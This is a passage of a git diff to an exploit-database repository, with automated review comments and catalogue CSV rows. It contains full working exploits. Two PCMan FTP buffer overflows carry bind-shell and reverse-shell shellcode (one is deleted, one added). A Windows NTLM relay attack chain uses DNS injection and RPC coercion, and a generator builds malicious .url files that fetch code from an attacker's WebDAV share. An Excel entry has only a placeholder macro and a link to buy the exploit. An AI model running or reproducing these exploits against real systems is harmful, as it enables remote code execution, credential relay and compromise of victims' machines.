+ if args.url:
+ exploit.exploit_target(args.url, args.output)
+ elif args.file:
+ exploit.scan_multiple_targets(args.file, args.threads, args.output)
+ else:
+ parser.print_help()
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/windows/local/52332.txt b/exploits/windows/local/52332.txt
new file mode 100644
index 000000000..ac7212c09
--- /dev/null
+++ b/exploits/windows/local/52332.txt
@@ -0,0 +1,67 @@
+# Titles: Microsoft Excel Use After Free - Local Code Execution
+# Author: nu11secur1ty
+# Date: 06/09/2025
+# Vendor: Microsoft
+# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
+# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
+# Versions: MS Excel 2016, MS Office Online Server KB5002699
+# CVE-2025-27751
+
+## Description:
+The attacker can trick any user into opening and executing their code by
+sending a malicious DOCX file via email or a streaming server.
+After the execution of the victim, his machine can be infected or even
+worse than ever; this could be the end of his Windows machine!
+
+STATUS: HIGH-CRITICAL Vulnerability
+
+
+[+]Exploit:
+
+```
+Sub hello()
+Dim Program As String
+Dim TaskID As Double
+On Error Resume Next
+---------------------------------------
+Program = "WRITE YOUR OWN EXPLOIT HERE"
+TaskID = ...YOUR TASK HERE...
+---------------------------------------
+If Err <> 0 Then
+MsgBox "Can't start " & Program
+End If
+End Sub
+```
+
+# Reproduce:
+[href](https://www.youtube.com/watch?v=ArI0ZeChYE4)
+
+# Buy an exploit only:
+[href](https://satoshidisk.com/pay/COb5oS)
+
+# Time spent:
+00:35:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+--
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstorm.news/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
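Review bot: The entry contains no proof of concept for CVE-2025-27751: the VBA block is a placeholder (`Program = "WRITE YOUR OWN EXPLOIT HERE"`, `TaskID = ...YOUR TASK HERE...`) with an `On Error Resume Next` and an `Err` check but nothing that reaches a use-after-free, and the description talks about a malicious DOCX although the title, vendor link and `Versions` line are about Excel. The header should state which document type and which builds the issue was actually reproduced on, and the placeholder macro should either be dropped or labelled as illustrative so it is not mistaken for the trigger. The signature block is pasted twice with differing `packetstormsecurity.com` / `packetstorm.news` URLs; one copy is enough.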
diff --git a/exploits/windows/remote/26471.NA b/exploits/windows/remote/26471.NA
deleted file mode 100644
index 6e6c0a69a..000000000
--- a/exploits/windows/remote/26471.NA
+++ /dev/null
@@ -1,129 +0,0 @@ -#!/usr/bin/env python - -import signal -from time import sleep -from socket import * -from sys import exit, exc_info - -# -# Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command -# Discovered and Reported******June 2013 -# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators -# Exploit/Advisory*************http://infosec42.blogspot.com/ -# Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) -# Tested Commands*************USER (Other commands were not tested and may be vulnerable) -# CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending -# - - -def sigHandle(signum, frm): # Signal handler - - print "\n[!!!] Cleaning up the exploit... [!!!]\n" - sleep(1) - exit(0) - - -def targServer(): - - while True: - try: - server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>")) - server = inet_ntoa(server) - break - except: - print "\n\n[!!!] Error: Please enter a valid IPv4 address. 
[!!!]\n\n" - sleep(1) - continue - - return server - - -def main(): - - print ("""\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command - [*] Discovered and Reported******June 2013 - [*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators - [*] Exploit/Advisory*************http://infosec42.blogspot.com/ - [*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) - [*] Tested Commands*************USER (Other commands were not tested and may be vulnerable) - [*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""") - signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c - victim = targServer() - port = int(21) - Cmd = "USER " #Vulnerable command - JuNk = "\x42" * 2004 - # KERNEL32.dll 7CA58265 - JMP ESP - ret = "\x65\x82\xA5\x7C" - NOP = "\x90" * 50 - - #348 Bytes Bind Shell Port TCP/4444 - #msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R | - #msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R - shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9" - shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46" - shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84" - shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8" - shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08" - shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27" - shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24" - shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80" - shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98" - shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7" - shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0" - shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82" - shellcode += 
"\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0" - shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6" - shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d" - shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32" - shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90" - shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5" - shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71" - shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2" - shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f" - shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14" - shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec" - shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88" - shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79" - - sploit = Cmd + JuNk + ret + NOP + shellcode - sploit += "\x42" * (2992 - len(NOP + shellcode)) + "\r\n" - - try: - print "\n [*] Creating network socket." - net_sock = socket(AF_INET, SOCK_STREAM) - except: - print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() - sleep(1) - exit(0) - - try: - print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port) - net_sock.connect((victim, port)) - except: - print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info()) - sleep(1) - exit(0) - - try: - print """ [*] Attempting to exploit the FTP USER command. - [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. - [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) - net_sock.send(sploit) - sleep(1) - except: - print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) - sleep(1) - exit(0) - - try: - print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! 
- [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" - net_sock.close() - except: - print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() - sleep(1) - exit(0) - - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/exploits/windows/remote/52326.txt b/exploits/windows/remote/52326.txt new file mode 100644 index 000000000..f11f9932b --- /dev/null +++ b/exploits/windows/remote/52326.txt 
@@ -0,0 +1,72 @@
+# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
+# Date: 04/17/2025
+# Exploit Author: Fernando Mengali
+# Vendor Homepage: http://pcman.openfoundry.org/
+# Software Link:
+https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
+# Version: 2.0.7
+# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
+Service Pack 2)
+# CVE: CVE-2025-4255
+
+# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
+EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
+#offset: 2007
+#badchars: \x00\x0a\x0d
+#EIP: 0x74e32fd9 (JMP ESP)
+
+my $buf =
+"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
+"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
+"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
+"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
+"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
+"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
+"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
+"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
+"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
+"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
+"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
+"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
+"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
+"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
+"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
+"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
+"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
+"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
+"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
+"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
+"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
+"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
+"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
+"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
+"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
+"\x17";
+
+
+# Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
+
+my $sock = IO::Socket::INET->new(
+ PeerAddr => "192.168.176.131",
+ PeerPort => "21",
+ Proto => 'tcp',
+) or die "Cannot connect to 192.168.176.131:21: $!\n";
+
+my $offset = "A"x2007;
+my $eip = "\xd9\x2f\xe3\x74";
+my $nops = "\x90"x20;
+my $payload = $offset . $eip . $nops . $buf;
+my $r = <$sock>;
+print $sock "USER anonymous\r\n";
+$r = <$sock>;
+print $r;
+sleep(1);
+print $sock "PASS anonymous\r\n";
+$r = <$sock>;
+print $r;
+sleep(1);
+print $sock "RMD $payload\r\n";
+$r = <$sock>;
+print $r;
+sleep(1);
+close($sock);
\ No newline at end of file
diff --git a/exploits/windows/remote/52330.py b/exploits/windows/remote/52330.py
new file mode 100755
index 000000000..8c9fc9e09
--- /dev/null
+++ b/exploits/windows/remote/52330.py
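Review bot: The `# Tested on:` line contradicts itself — it names Windows XP SP3 and then a build string ending in `Service Pack 2`, and that same build string is repeated as a stray comment above `my $sock`; keep one and make the service pack consistent. Several header comments were wrapped at mail width, so their continuations (`+https://www.exploit-db.com/apps/...`, `+Service Pack 2)`, `+EXITFUNC=thread ...`) are bare lines outside any `#` comment, which means the file as stored is not what the author ran. The file is a Perl script stored with a `.txt` extension, unlike the neighbouring PCMan entries indexed as `.py`/`.rb`; the extension or the title should indicate the language.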
@@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE) +# Author: Mohammed Idrees Banyamer +# Instagram: @banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-06-13 +# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2 +# CVE: CVE-2025-33073 +# Type: Remote +# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025) +# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay +# User Interaction: Required (authenticated domain user) +# Remediation Level: Official Fix Available +# +# Affected Versions: +# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x) +# - Windows Server 2022 (including 23H2 editions) +# - Windows Server 2019 +# - Windows 10 versions from 1507 up to 22H2 +# - Windows Server 2016 and 2008 (with appropriate versions) +# +# Description: +# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients, +# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx, +# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server +# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x), +# Windows Server 2022, and earlier versions vulnerable to this method. +# +# +# Note: The exploit requires the victim to be an authenticated domain user and the environment +# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA). +# +# DISCLAIMER: For authorized security testing and educational use only. 
+ +import argparse +import subprocess +import socket +import time +import sys + +def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip): + print("[*] Injecting DNS record via samba-tool (requires admin privileges)...") + cmd = [ + "samba-tool", "dns", "add", dns_ip, dc_fqdn, + record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword" + ] + try: + subprocess.run(cmd, check=True) + print("[+] DNS record successfully added.") + except subprocess.CalledProcessError: + print("[!] Failed to add DNS record. Check credentials and connectivity.") + sys.exit(1) + +def check_record(record_name): + print("[*] Verifying DNS record propagation...") + for i in range(10): + try: + result = socket.gethostbyname_ex(record_name) + if result and result[2]: + print(f"[+] DNS record resolved to: {result[2]}") + return True + except socket.gaierror: + time.sleep(2) + print("[!] DNS record did not propagate or resolve.") + return False + +def start_ntlmrelay(target): + print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...") + try: + subprocess.Popen([ + "impacket-ntlmrelayx", "-t", target, "--no-smb-server" + ]) + print("[*] NTLM relay server started.") + except Exception as e: + print(f"[!] Failed to start NTLM relay server: {e}") + sys.exit(1) + +def trigger_coercion(victim_ip, fake_host): + print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...") + cmd = [ + "rpcping", + "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]", + "-s", fake_host, + "-e", "1234", + "-a", "n", + "-u", "none", + "-p", "none" + ] + try: + subprocess.run(cmd, check=True) + print("[+] Coercion RPC call sent successfully.") + except subprocess.CalledProcessError: + print("[!] RPC coercion failed. 
Verify victim connectivity and service status.") + sys.exit(1) + +def main(): + parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion") + parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server") + parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)") + parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller") + parser.add_argument("--target", required=True, help="Target system to relay authentication to") + parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from") + args = parser.parse_args() + + record = "relaytrigger" + fqdn = f"{record}.{args.dc_fqdn}" + + inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip) + if not check_record(fqdn): + print("[!] DNS verification failed, aborting.") + sys.exit(1) + + start_ntlmrelay(args.target) + time.sleep(5) # Wait for relay server to be ready + + trigger_coercion(args.victim_ip, fqdn) + + print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/52334.NA b/exploits/windows/remote/52334.NA new file mode 100644 index 000000000..594d1d22d --- /dev/null +++ b/exploits/windows/remote/52334.NA 
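Review bot: `start_ntlmrelay` discards the `subprocess.Popen` handle, so the process it spawns is never waited on or terminated — once `main` prints its final message and returns, the child is left running as an orphan, and the surrounding `except Exception` hides which failure actually occurred. Keep and return the handle (`proc = subprocess.Popen([...])` / `return proc`), catch `OSError` instead of `Exception`, and have `main` call `proc.terminate()` in a `finally` before it exits. In `check_record` the loop variable in `for i in range(10)` is unused; `for _ in range(10)` makes that explicit, and the function's polling interval and attempt count deserve a one-line comment since they are magic numbers.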
@@ -0,0 +1,62 @@ +Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE) +Date: June 2025 +Author: Dev Bui Hieu +Tested on: Windows 10, Windows 11 +Platform: Windows +Type: Remote +CVE: CVE-2025-33053 + +Description: +This exploit leverages the behavior of Windows .URL files to execute a +remote binary over a UNC path. When a victim opens or previews the .URL +file (e.g. from email), the system may automatically reach out to the +specified path (e.g. WebDAV or SMB share), leading to arbitrary code +execution without prompt. + +```bash +python3 gen_url.py --ip 192.168.1.100 --out doc.url +``` + +import argparse + +def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified): + content = f"""[InternetShortcut] +URL={url_target} +WorkingDirectory={working_directory} +ShowCommand=7 +IconIndex={icon_index} +IconFile={icon_file} +Modified={modified} +""" + with open(output_file, "w", encoding="utf-8") as f: + f.write(content) + print(f"[+] .url file created: {output_file}") + +def main(): + parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)") + + parser.add_argument('--out', default="bait.url", help="Output .url file name") + parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path") + parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)") + parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe", + help="Target executable path on victim machine") + parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", + help="Icon file path") + parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)") + parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)") + + args = parser.parse_args() + + working_directory = fr"\\{args.ip}\{args.share}\\" + + 
generate_url_file( + output_file=args.out, + url_target=args.exe, + working_directory=working_directory, + icon_file=args.icon, + icon_index=args.index, + modified=args.modified + ) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 24225c382..0d466b2e0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
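Review bot: The file mixes a prose header, a ```bash usage block and the Python source in one document stored as `52334.NA`, so it is neither a runnable script nor a plain advisory — `import argparse` and the rest of the code follow the closed bash fence with no fence of their own. Either split the script into its own `.py` with the advisory text kept separate, or wrap the code in a ```python fence. The usage example invokes `gen_url.py`, a name that does not match this file, and the title says Windows 10 while `Tested on` lists Windows 10 and Windows 11; both should be reconciled.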
@@ -5208,6 +5208,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,,2021-06-10,2021-10-28,0,,,,,,
 38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",remote,ios,,2013-07-09,2015-11-05,1,,,,,,https://www.securityfocus.com/bid/61081/info
 34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios,,2014-08-24,2014-08-24,0,OSVDB-110474;OSVDB-110446;OSVDB-110445,,,,,
+52333,exploits/ios/remote/52333.py,"AirKeyboard iOS App 1.0.5 - Remote Input Injection",2025-06-15,"Chokri Hammedi",remote,ios,,2025-06-15,2025-06-15,0,CVE-n/a,,,,,
 42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",remote,ios,,2017-10-17,2017-10-17,1,CVE-2017-7115,,OneRing,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
 42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",remote,ios,,2017-09-25,2017-09-27,1,CVE-2017-11120,"Out Of Bounds",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,,2014-03-10,2015-12-28,1,CVE-2013-6835;OSVDB-104272,,,,,https://www.securityfocus.com/bid/66108/info
@@ -10549,6 +10550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,,2004-01-28,2012-12-23,1,CVE-2004-2134;OSVDB-20189,,,,,https://www.securityfocus.com/bid/9515/info
 21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,local,multiple,,2002-02-07,2012-09-12,1,CVE-2002-1731;OSVDB-27079,,,,,https://www.securityfocus.com/bid/4059/info
 43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2017-18016,,,,,https://github.com/tintinweb/pub/tree/352d69d518b9b9c0f4983f1254418f0e9755cbb2/pocs/cve-2017-18016
+52329,exploits/multiple/local/52329.py,"Parrot and DJI variants Drone OSes - Kernel Panic Exploit",2025-06-15,"Mohammed Idrees Banyamer",local,multiple,,2025-06-15,2025-06-15,0,CVE-2025-37928,,,,,
 16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,local,multiple,,2010-09-20,2016-10-27,1,CVE-2009-2261;OSVDB-54966,"Metasploit Framework (MSF)",,,http://www.exploit-db.compeazip-2.6.1.WINDOWS.exe.zip,
 22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",local,multiple,,2002-02-22,2012-10-27,1,,,,,,https://www.securityfocus.com/bid/6909/info
 7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",local,multiple,,2008-12-16,,1,OSVDB-53573,,,,,
@@ -12386,6 +12388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
 52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
+52335,exploits/multiple/webapps/52335.py,"Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI",2025-06-15,"Cristian Branet",webapps,multiple,,2025-06-15,2025-06-15,0,CVE-2025-49619,,,,,
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
 49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
@@ -14238,7 +14241,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
 5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
-52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,,
+52327,exploits/php/webapps/52327.txt,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-06-15,/bin/neko,webapps,php,,2025-06-15,2025-06-15,0,CVE-2025-46041,,,,,
 37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
 26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
 27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
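Review bot: This hunk drops the catalogue row for id 52147 (`exploits/php/webapps/52147.NA`, CVE-2024-37732) and adds id 52327 (`exploits/php/webapps/52327.txt`, CVE-2025-46041) in its place; the ids, authors and CVEs all differ, so these are two distinct records rather than one record being updated. Neither the removal of `52147.NA` nor the addition of `52327.txt` is visible in this part of the diff, so if `52147.NA` still exists after this commit it is left with no index entry and should either be re-added here or deleted alongside its row.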
@@ -22953,6 +22956,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php,,2011-07-13,2012-10-28,1,,,,,,
 26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php,,2005-11-17,2013-07-02,1,CVE-2005-3695;OSVDB-20908,,,,,https://www.securityfocus.com/bid/15485/info
